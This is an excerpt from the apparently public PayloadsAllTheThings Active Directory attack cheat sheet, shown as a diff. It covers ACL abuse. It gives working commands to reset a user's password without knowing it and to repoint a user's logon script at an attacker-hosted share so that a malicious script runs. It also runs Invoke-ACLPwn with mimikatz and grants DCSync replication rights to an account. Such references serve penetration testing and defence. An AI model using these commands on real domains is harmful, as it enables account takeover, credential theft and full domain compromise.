swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

 * **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group
 * **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose`
 * **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
+* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All.
+[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'`
+    ```powershell
+    # give DCSync right to titi
+    Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
+    ```

 ### Trust relationship between domains